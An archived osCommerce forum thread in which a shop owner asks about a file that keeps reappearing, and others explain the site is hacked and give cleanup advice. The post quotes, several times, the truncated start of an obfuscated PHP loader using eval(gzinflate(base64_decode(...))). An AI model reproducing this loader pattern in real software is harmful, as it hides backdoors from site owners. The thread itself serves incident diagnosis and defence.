Jump to content
dev osCommerce
Forum
  • Checkout
  • Login
  • Contact Us
  • Get in touch

osCommerce

The e-commerce.

New Demo
Our Partners

what is this file?

fatshoesday

By fatshoesday
in General Support

Recommended Posts

fatshoesday

fatshoesday

Posted
Posted

Hi,

 

This file is in my root directory. It looks like code I saw when our site got hacked. I tried deleting it but it keeps reappearing. Any advice?

 

<?php eval(gzinflate(base64_decode('
pX1dkyu9bea9f8VbtRfOVq2qRtLMaKY2iSsbOylfxE5lvRd7daql6ZH6jKSW1dKZV+fXByT6g/jgQ419
49dnBOIB2SQIggD4u3/+x9+ddqffvNXvzbH+h9/+53/9+ff/71//8u1P//Iff/g2X76+/vZ//fLbc12/....

 

I also have this file apearing DS_Store - Don't know what it is either?

FIMBLE

FIMBLE

Posted
Posted

Hi,

 

This file is in my root directory. It looks like code I saw when our site got hacked. I tried deleting it but it keeps reappearing. Any advice?

 

<?php eval(gzinflate(base64_decode('
pX1dkyu9bea9f8VbtRfOVq2qRtLMaKY2iSsbOylfxE5lvRd7daql6ZH6jKSW1dKZV+fXByT6g/jgQ419
49dnBOIB2SQIggD4u3/+x9+ddqffvNXvzbH+h9/+53/9+ff/71//8u1P//Iff/g2X76+/vZ//fLbc12/....

 

I also have this file apearing DS_Store - Don't know what it is either?

 

 

It means im sorry to say that you have been hacked, click the link im my signature for help

Nic

Sometimes you're the dog and sometimes the lamp post

[/url]

My Contributions

fatshoesday

fatshoesday

Posted
  • Author
Posted

I do not understand. I completely deleted the original site and replaced it. Changed the Admin folder file name and everything. How can is it coming back?

web-project

web-project

Posted
Posted

It means im sorry to say that you have been hacked, click the link im my signature for help

Nic

 

the code it self mean nothing and doesn't mean that you been hacked, it simply someone encoded nasty peace of code (to trace or spy) inside of your oscommerce.

Please read this line: Do you want to find all the answers to your questions? click here. As for contribution database it's located here!

8 people out of 10 don't bother to read installation manuals. I can recommend: if you can't read the installation manual, don't bother to install any contribution yourself.

Before installing contribution or editing/updating/deleting any files, do the full backup, it will save to you & everyone here on the forum time to fix your issues.

Any issues with oscommerce, I am here to help you.

fatshoesday

fatshoesday

Posted
  • Author
Posted

the code it self mean nothing and doesn't mean that you been hacked, it simply someone encoded nasty peace of code (to trace or spy) inside of your oscommerce.

How does this help me get rid of it? Do I not need to get rid of it?

burtonsnow8

burtonsnow8

Posted
Posted

How does this help me get rid of it? Do I not need to get rid of it?

 

you should get rid of it. The decoder will show you where the malicious files are located usually. You will have to delete those files to make sure the script does not pop up anymore.

MrPhil

MrPhil

Posted
Posted

the code it self mean nothing and doesn't mean that you been hacked, it simply someone encoded nasty peace of code (to trace or spy) inside of your oscommerce.

Eh? Any time someone adds a piece of code, without authorization or knowledge of the owner, it is by definition a "hack". It doesn't matter how innocent (or not) it is.

 

<?php eval(gzinflate(base64_decode('

pX1dkyu9bea9f8...

 

Just change eval to echo and it should print out the nasty code for you to see (rather than running it).

fatshoesday

fatshoesday

Posted
  • Author
Posted

Eh? Any time someone adds a piece of code, without authorization or knowledge of the owner, it is by definition a "hack". It doesn't matter how innocent (or not) it is.

 

 

 

Just change eval to echo and it should print out the nasty code for you to see (rather than running it).

I am afraid I am clueless. How exactly does this work once I change Eval to Echo?

burtonsnow8

burtonsnow8

Posted
Posted

I am afraid I am clueless. How exactly does this work once I change Eval to Echo?

 

 

echo will make it write the deocded text to a page.

 

 

Basically make a new file, paste the code, replace "eval" with "echo" and then load the page in your browser.

FWR Media

♥FWR Media

Posted
Posted

deleted as I spoke rubbish

Ultimate SEO Urls 5 PRO - Multi Language Modern, Powerful SEO Urls

 

KissMT Dynamic SEO Meta & Canonical Header Tags

 

KissER Error Handling and Debugging

 

KissIT Image Thumbnailer

 

Security Pro - Querystring protection against hackers ( a KISS contribution )

 

If you found my post useful please click the "Like This" button to the right.

Please only PM me for paid work.

MrPhil

MrPhil

Posted
Posted

I am afraid I am clueless. How exactly does this work once I change Eval to Echo?

 

It will print out the code that it would have otherwise run (doing bad things, no doubt). You can look at this code to try to get an idea of what external web sites are involved (if any), what hidden files are being brought to be executed, and so on. Then you can proceed to find and exterminate these hacker files or database entries, block external sites (ban by IP), and take other actions. And of course, get rid of that line of code once you've got a look at what it does. If you have no idea what's going on, you'll need to bring in someone who does.

 

There's a good chance that there are hidden or concealed files on your site, or some script in a database entry or script in a planted image. It will take some detective work to find all the pieces. Also check your PC: scan for spyware (such as password sniffers and keystroke loggers), not just viruses. You don't want a hacker reading all your passwords as soon as you type them in. Make sure your firewall is operating correctly. Change every password associated with your hosting site, osC admin, FTP access, etc. Change any directory or file permission that is "world writable" (e.g., 777, 666) to remove such permissions (first take a look at

http://www.oscommerce.com/forums/index.php?showtopic=327395&view=findpost&p=1443272) Talk with your hosting service about security measures you can take. Upgrade to the latest osC (2.2 RC2a), to get the latest security fixes. Search this forum for additional security fixes. At the least, put your Admin directory tree under password protection. Remove the File_manager.

fatshoesday

fatshoesday

Posted
  • Author
Posted

It will print out the code that it would have otherwise run (doing bad things, no doubt). You can look at this code to try to get an idea of what external web sites are involved (if any), what hidden files are being brought to be executed, and so on. Then you can proceed to find and exterminate these hacker files or database entries, block external sites (ban by IP), and take other actions. And of course, get rid of that line of code once you've got a look at what it does. If you have no idea what's going on, you'll need to bring in someone who does.

 

There's a good chance that there are hidden or concealed files on your site, or some script in a database entry or script in a planted image. It will take some detective work to find all the pieces. Also check your PC: scan for spyware (such as password sniffers and keystroke loggers), not just viruses. You don't want a hacker reading all your passwords as soon as you type them in. Make sure your firewall is operating correctly. Change every password associated with your hosting site, osC admin, FTP access, etc. Change any directory or file permission that is "world writable" (e.g., 777, 666) to remove such permissions (first take a look at

http://www.oscommerce.com/forums/index.php?showtopic=327395&view=findpost&p=1443272) Talk with your hosting service about security measures you can take. Upgrade to the latest osC (2.2 RC2a), to get the latest security fixes. Search this forum for additional security fixes. At the least, put your Admin directory tree under password protection. Remove the File_manager.

 

Hi, I changed the eval to echo and browsed to the the page. but it just cam up page not found and did not print. I already moved my admon folder/ and deleted filemanager along with the other stuff an after that the code seemed to return in this file "cacheseo_english.cache"

Archived

This topic is now archived and is closed to further replies.

Go to topic listing
×
×
  • Create New...